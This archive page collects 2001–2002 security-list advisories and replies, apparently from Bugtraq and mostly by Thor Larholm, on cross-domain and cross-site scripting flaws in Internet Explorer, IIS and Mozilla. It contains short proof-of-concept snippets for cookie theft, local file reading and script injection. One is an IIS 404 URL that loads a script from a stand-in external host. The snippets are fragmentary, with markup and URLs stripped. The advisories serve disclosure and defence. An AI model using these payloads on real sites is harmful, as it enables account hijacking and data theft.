If your vulnerability did not deal with OWC, then apologize my intrusion and
let me guess on a Content-Type/Content-Disposition variant - though your
suggested workaround would make no sense then :)

Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?

-Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED]]
Sent: 30. juli 2002 16:36
Subject: warning

Consider this a warning, full details to come soon.
windows + ie 6.0 + office xp may get owned by visiting a web page.
workaround/solution: disable activex and plugins until someone produce a
After this warning, don't whine about responsibity issues - first check
microsoft's responsiblity in help - about

Georgi Guninski

IE allows universal Cross Domain Scripting (TL#003)

2002-07-10 Thread Thor Larholm

Thor Larholm, PivX, security advisory TL#003

By Thor Larholm, Denmark
10 July 2002

HTML format:

Topic: IE allows universal Cross Domain Scripting.

Discovery date: 25 June 2002.

Severity: High

Affected applications:

Any application that hosts the WebBrowser control. Some of these are:

Microsoft Internet Explorer
Microsoft Outlook
Microsoft Outlook Express


Elevating privileges, arbitrary command execution, local file reading,
stealing arbitrary cookies, etc.


Patrick Zumstein and Thor Larholm.


One of the many elements in HTML 4 is the OBJECT element which is used to
embed external objects inside a page. Such objects can be the WebBrowser
control and other ActiveX controls, images, applets and more.
The object property of embedded WebBrowser controls is not subject to the
Cross Domain security checks that embedded HTML documents ordinarily go
through, and as such it is possible to escape any sandboxing and security
zone restrictions.


Any document can extend the properties exposed by the OBJECT element, and
any namespace conflicts are handled by querying the object property which is
a duplicate reference to the embedded document.
When embedding a document from the same site (same protocol, port and host)
it is possible to make a reference to the object property without
circumventing any Cross Domain security checks. After having established a
reference we will then change the location of the document being embedded.
The location changes but the reference stays, and we now have complete
access to the DOM of the foreign document.
The default object being referenced by the object property in the case of
text/html is the document object. The simple proof-of-concept exploit below
will read the cookie from
The OBJECT element is not restricted to embedding HTML documents, but can
embed objects of any type. As such, this vulnerability could be extended
even further.


object id=data data=empty.html type=text/html/object
var ref=document.getElementById(data).object;
ref.location.href =;;


Disable ActiveX, or
Set Script ActiveX controls marked safe for scripting to Prompt or Disable
( URL: ).

Tested on:

IE6 Win2000, all patches and servicepacks.
IE5.5 Win98, all patches and servicepacks.
IE5.5 WinNT 4, all patches and servicepacks.


I have put together some proof-of-concept examples:

- Read foreign cookies
- Read local (or foreign) file
- Execute arbitrary commands

These can be found at

Vendor status:

Microsoft was notified 25 June 2002.

Mitigating factors:

Outlook and OE are not directly affected if they run in the Restricted zone.


On June 25, Patrick Zumstein notified Thor Larholm, Georgi Guninski and
PacketStormSecurity about a possible vulnerability. In working together,
Patrick and Thor quickly outlined the culprit and prepared this advisory,
after which Microsoft were notified immediately.
Since this is possibly very publicly known by now I have decided to release
this advisory after only 2 weeks times, so that system administrators and
end users may possibly apply the provided workaround to temporarily secure
themselves until a proper patch has been made.

Thor Larholm, Security Researcher
PivX Solutions, LLC

Unpatched IE security holes - 19 and counting
Are You Secure?

RE: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

2002-06-06 Thread Thor Larholm
I was a bit confused as to whether this had to be triggered _from_ the My
Computer zone, but tests quickly proofed that this is definitely remotely

To clear things up, this is yet another XSS vulnerability that allows
arbitrary HTML to be inserted in the My Computer zone. This makes it quite
easy to e.g. execute arbitrary commands, undoubtedly a more fun

Status: 18 unpatched vulnerabilities.

Thor Larholm
Jubii A/S - Internet Programmer

RE: Update and comments on the MS02-023 patch, holes still remain

2002-05-17 Thread Thor Larholm

In my comments I wrote that the cssText vulnerability appeared to be
patched. After further testing and research I will have to correct myself,
as the issue is not patched at all.

To sum it up:

On February 18, GreyMagic discovered a vulnerability in the cssText property
of imported stylesheets. After Microsoft had researched it for 44 days
GreyMagic released their advisory on April 2. According to the MS02-023
bulletin released by Microsoft on May 15, this vulnerability should now be
patched. However, using a simple HTTP redirect circumvents this new

I seem not to be the only one who has discovered this fact. GreyMagic
Software have updated their advisory on the cssText vulnerability and
bundled a new example that works post MS02-023, which can be found at

Thor Larholm
Jubii A/S - Internet Programmer

Update and comments on the MS02-023 patch, holes still remain

2002-05-16 Thread Thor Larholm

The latest cumulative patch from Microsoft, , promises
to eliminate six newly discovered vulnerabilities, but fails to do so.

First, we find what MS calls A cross-site scripting vulnerability in a
Local HTML Resource. This is obviously a reference to the dialogArguments
vulnerability, and as such this mislabelling name does not bode well to
begin with. In fact, MS seems to have misunderstood quite a number of issues
surrounding this vulnerability. The first such is found in their list of
mitigating factors:

A successful attack requires that a user first click on a hyperlink. There
is no way to automate an attack using this vulnerability. 

The above is blatantly untrue, and was repeatedly demonstrated to MS both in
the initial notification phase and when we worked together to reproduce the
issue. Nothing in the world stops this vulnerability from being
automatically exploited.
Another 'mitigating' factor:

Outlook 98 and 2000 (after installing the Outlook Email Security Update),
Outlook 2002, and Outlook Express 6 all open HTML mail in the Restricted
Sites Zone. As a result, customers using these products would not be at risk
from email-borne attacks. 

The above is merely misinformation on their parts. The Restricted Sites Zone
tries to disable scripting ( a requisite for the dialogArguments
vulnerability ), but many vulnerabilities allow you to circumvent this
setting ( one such listed on /unpatched/ ). As such, you can still script in
the Restricted Sites Zone, and as such customers using these products are
still at risk from email-borne attacks.

Aside from these misunderstandings it could appear as though Microsoft is
not actively keeping up with the security community and its publications.
The dialogArguments issue was originally demonstrated with a ressource file
only found in Internet Explorer 6- Shortly after being disclosed GreyMagic
Software highlighted how another ressource file was also vulnerable, which
existed from IE5 and onwards. Microsoft has fixed the vulnerability in IE6

I repeat, IE5 and IE5.5 are still vulnerable.

The same severity rating (Critical) also apply to IE5 and IE5.5, with the
exception that they still remain unpatched. The demonstration was fixed
instead of the vulnerability. If you want to convince yourself about this
(and still use the appareantly unsupported IE5 or IE5.5 browser), try the
examples in GreyMagics appendix to my advisory at .

Next, we find that the cssText vulnerability should be patched. Most of my
systems behave properly and appear to have this vulnerability patched,
though some still allow local file reading. More testing needed, but likely
not a job full done. So far it appears patched.

The Script within Cookies Reading Cookies vulnerability also have the same
incorrect 'mitigating' factor as dialogArguments, and claims that

An attacker would have to entice a user to first click on a hyperlink to
initiate an attempt to exploit this vulnerability. There is no way to
automate an attack that exploits this vulnerability.

Of course, this is also untrue since Internet Explorer comes equipped with a
nice click method on links that a programmer can execute, duplicating an
actual click (
). As such, nothing stops anyone from exploiting this vulnerability

The zone spoofing vulnerability sounds interesting, but I can find no
further details (MS is not exactly full disclosure).

And finally we have two variants of the Content Disposition vulnerability.
The first depends on an unknown thirdparty program (your guess is as good as
mine). The second depends on an executable being present, and has a
misinforming mitigating factor:

Any attempt to exploit the vulnerability requires that the attacker host a
malicious executable on a server accessible to the intended victim. If the
hosting server is unreachable for any reason, such as DNS blocking or the
server being taken down, the attack would fail. 

The above seems to discuss an email-borne attack, and as such there is no
dependancy on external servers. Outlook can easily parse attached
executables through CID: (Content-ID) and as such this mitigating factor is
quite minute since the email itself would act as the hosting server.

Yesterday I hosted a list of 14 publickly known unpatched vulnerabilities,
today I host a list of 12 such. It can still be found at

Just my .02 kroner of comments :)

Thor Larholm
Jubii A/S - Internet Programmer

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm


Netscape sure must be in financial problems since they are selling out on
their users security for a lousy $1000.

I know for one that I personally will release any future Netscape advisories
with full public disclosure and without prior Netscape notification. As a
matter of fact, why not start now ?

The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun.
A typical IRC URL could look like this:


The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. 
If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following

The exception unknown software exception (0xc0fd) occured in the
application at location 0x60e42edf 

Mozilla 0.9.9 gives a similar exception: 

The exception unknown software exception (0xc0fd) occured in the
application at location 0x60dd2c79.

Other versions of Mozilla/NS6/Galeon likely share the same flaw.
I haven't tested further on how practically exploitable this is.
Short example online at

Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection

When embedding a stylesheet with the LINK element, access to CSS files
from other protocols is prohibited by the security manager. A simple HTTP
redirect circumvents this security restriction and it becomes possible to
use local or remote files of any type, with the side effect that you can
detect if specific local files exist.

Thor Larholm
Jubii A/S - Internet Programmer

-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

GreyMagic Security Advisory GM#001-NS

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.

Important notes:

Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to [EMAIL PROTECTED] and [EMAIL PROTECTED]

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a Bug Bounty program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conducts made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.



XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 Jelmer published an advisory titled MSIE6 can read local
files, which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by



Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the open method to a web page that will redirect to a
local/remote file it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText


This example attempts to read c:/test.txt, getFile.asp internally
redirects to file://c:/test.txt:

var oXML=new XMLHttpRequest();,getFile.asp,false);


Users of Netscape Navigator should move to a better performing, less buggy

Tested on:

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


A fully dynamic proof-of-concept demonstration of this issue is available at

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm

 A fully dynamic proof-of-concept demonstration
 of this issue is available at

As some of you may have noticed, the above proof-of-concept does not work in
Mozilla 1.0 Release Candidate 1.

Don't get your hopes high about this though, the issue has not been fixed in
moz1rc1 - the XMLHttpRequest was simply broken in this version of the
browser for unknown reasons, a fact not mentioned in the release notes. When
trying to use it, either nothing happens or the browser crashes. The
proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would
work fine in moz1rc1 if the XMLHttpRequest object could be used at all.

The Mozilla XML-Extras project also includes a document.load method that is
used to load XML documents. The same issue applies to this method, and a
proof-of-concept demonstration that also works in moz1rc1 can be found at

Thor Larholm
Jubii A/S - Internet Programmer

IE allows universal Cross Site Scripting (TL#002)

2002-04-16 Thread Thor Larholm

Thor Larholm security advisory TL#002

By Thor Larholm, Denmark.
16 April 2002

HTML Format:

Topic: IE allows universal Cross Site Scripting. 

Discovery date: 18 March 2002. 

Severity: High

Affected applications:

Any application that hosts the WebBrowser control (IE6+). Some of these are:

Microsoft Internet Explorer 
Microsoft Outlook 
Microsoft Outlook Express 


Elevating privileges, hijacking the MSN Messenger client, running script in
the My Computer zone, arbitrary command execution, etc. 


Among its extensive functionality, IE employs a set of useful methods to
display dialog windows. These, the showModalDialog and showModelessDialog
methods, can transfer objects from the originating page to the page being
displayed inside the dialog, by use of the dialogArguments property. 


The dialogArguments property tries to prevent interaction between remote
pages by comparing the location of the originating page and the dialog page.

When opening a dialog window (e.g. res://shdoclc.dll/policyerror.htm) from
another protocol, port or domain (e.g., the validation
code in IE will ensure that no objects are transferred, and no interaction
is as such possible. 
When both pages are on the same protocol, port and domain, the validation
code will allow interaction. 
Unfortunately, the validation code only checks the original URL instead of
the final URL, and it is as such possible to bounce a HTTP redirect from the
originating site to the desired dialog page that will allow interaction. 

It is worth noting that this is not in any way limited to the RES://
protocol. The flawed dialogArguments property also allows interaction
between different domains (e.g. YAHOO.COM to MICROSOFT.COM), different
protocols (HTTP to HTTPS, HTTP to FILE, etc.) and different ports (port 80
to port 21, port 80 to port 25, etc.) 

For the sake of demonstration, we take a look at shdoclc.dll which contains
several resource in the HTML category, labeled POLICYERROR.HTM,
contain the following script code: 

var site =  window.parent.dialogArguments.url;

function printSite()
document.write( site);


var sCode = ''+'scriptalert(This is running from:  +
window.showModalDialog(redirect.asp, {url:sCode})

Redirect.asp contains: 


Solution: (for MS)

Fix the faulty validation routine in dialogArguments.
Include input validation in resource files.
Also, fixing the incomplete MS02-015 patch will ensure that this specific
command execution vulnerability will not reoccur when the next CSS issue is

Solution: (for users)

Disable scripting. 

Tested on:

IE6sp1 Win2000 SP2, with all patches.
IE6sp1 Windows 98, with all patches.
IE6sp1 Windows 98 SE, with all patches.


I have put together some proof-of-concept examples: 
- Simple static examples: Demonstratory fixed code
- Advanced example: Input arbitrary script code 
- Hijacking MSN Messenger: An updated version of a previous bulletin 
- Executing arbitrary commands: How CodeBase was not fixed 

These can be found at

Vendor status:

Microsoft was notified 18 March 2002 and were able to reproduce the issue
They are currently (16 April 2002) investigating whether to address this in
an upcoming cumulative patch. 

Thor Larholm
Jubii A/S - Internet Programmer

IIS allows universal CrossSiteScripting

2002-04-10 Thread Thor Larholm

Thor Larholm security advisory TL#001

By Thor Larholm, Denmark.
10 April 2002

HTML format:

Topic: IIS allows universal CrossSiteScripting. 

Discovery date: 13 March 2002.

Severity: Medium

Affected applications:

Any IIS installation that hosts the default 404 error pages. This includes: 

IIS 4 
IIS 5 
IIS 5.1 


Stealing cookies from any IIS site, cross-domain scripting to any IIS site,
hijacking Hotmail and Passport accounts, elevating priveleges through
ActiveX components, hijacking the MSN Messenger client, etc. 


CrossSiteScripting is a term that describes the injection of script code on
foreign sites. A very likely scenario is where a malicious programmer would
inject code on e.g. to steal a victims cookies, allowing him/her
to hijack the victims email account. 
The default installation of IIS is suspectible to such a CSS error. 


Every time IIS encounters a HTTP 404 errorcode, it will display a 404 not
found page. 
This HTML file uses scripting to output a link to the SERVER.TLD part of the
URL, and by crafting a specially formed URL it is possible to include
arbitrary script commands on the 404 page, thereby enabling
CrossSiteScripting on any IIS site. 
If we look at 404.htm we will notice a particular line of code: 

document.write( 'A HREF=' + escape(urlresult) + '' + displayresult +
displayResult is derived from the first instance of :// in the URL until the
next instance of /. 
This means that we will have to include our script code before the path part
of the URL. To accomplish this we include our script code in the Basic
Authentication part of the URL, but we first have to escape any special
characters in the code. Any / character will end displayresult prematurely
and any spaces will corrupt the DNS lookup, and we therefor replace any
space with a TAB (%09) and any / with %5Cx2f (\x2f, as we will dynamically
reference an external file). 


http://img%09src=%09onerror=document.scripts[0].src=%27http%5Cx3a%5Cx2f%;[EMAIL PROTECTED]/SomeNonExistantPath
The above will include and execute on YOUR.TLD,
provided that YOUR.TLD is served by an IIS installation. 


Apply the MS02-018 patch ( ), or delete
the default 404 errorhandler page. 
You could also use the opportunity to make yourself a nice custom 404
errorhandler page. 
End-users can enable the Show friendly HTTP error messages option in IE. 


I have put together some proof-of-concept examples:
- Simple: Lists your cookies in a selection of Microsoft domains.
- Advanced: get the cookies from any IIS site.
- MSN: Discloses your MSN contactlist.

These can be found at

Thor Larholm
Jubii A/S - Internet Programmer

RE: MS 3/28/02 Security Patch for IE6 - warning!

2002-04-02 Thread Thor Larholm

Further, the patch doesn't seem to work completely:

Though, in other cases, it works better than expected:

A revision of the patch may be in place.

Thor Larholm
Jubii A/S - Internet Programmer

-Original Message-
From: Phil Dibowitz [mailto:[EMAIL PROTECTED]]
Sent: 2. april 2002 20:44
Subject: MS 3/28/02 Security Patch for IE6 - warning!


I usually consider this list a bit over my head, and don't post, just read.
not totally sure this is on-topic, but I think it is. =)

The MS Security Patch for IE6:

Security Update, March 28, 2002 (Internet Explorer 6)
2456 KB/ Download Time:  1 min The 28 March 2002 Cumulative Patch for
Explorer update eliminates all previously addressed security
affecting Internet Explorer 6, as well as two new vulnerabilities, and is 
discussed in Microsoft Security Bulletin MS02-015. Download now to protect
computer from these vulnerabilities, the most serious of which could allow a

malicious user to run code on your computer.

(That's directly from the MS Windows Update Site)

Seems to be pretty buggy. It trashed a Win2K machine of mine yesterday.
installing, I rebooted and shortly after lost my network connection... then
was unable to get into 'Network and Dialup Connections' or 'Add/Remove 
programs.' I tried recovery from 'Safe Mode' and 'Last known good
options at boot, but I had the same problems in both modes. Doing a
from CD didn't fix it either. As a last resort I chose to do an 'upgrade'
CD which downgraded IE6 to IE5 fixing the problem. I was then able to patch
to the latest IE MINUS that patch.

A friend mine also had a very similar experience with the patch. I'm curious
know if others have the same problem, and I also wanted to warn people.

Insanity Palace of Metallica

Stack Overflow in MSHTML.DLL

2001-01-15 Thread Thor Larholm

Stack Overflow in MSHTML.DLL

Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled emailreaders).
Reliably tested on IE4.0 and higher on any Windows system, with any servicepacks
and patches.
Older versions of MSHTML.DLL may be affected too, but remains untested.

Risk: Low/Medium

MSHTML.DLL crashes with a Stack Overflow from simple scripting.

The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.


iframe id=test style="display:none"/iframe
Larholm = {}; // Object literal; // Stream data
delete Larholm;
Larholm = {}; // Crash

Disable Active Scripting.

Vendor status:
Microsoft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be adressed in a future SP
for IE.

Thor Larholm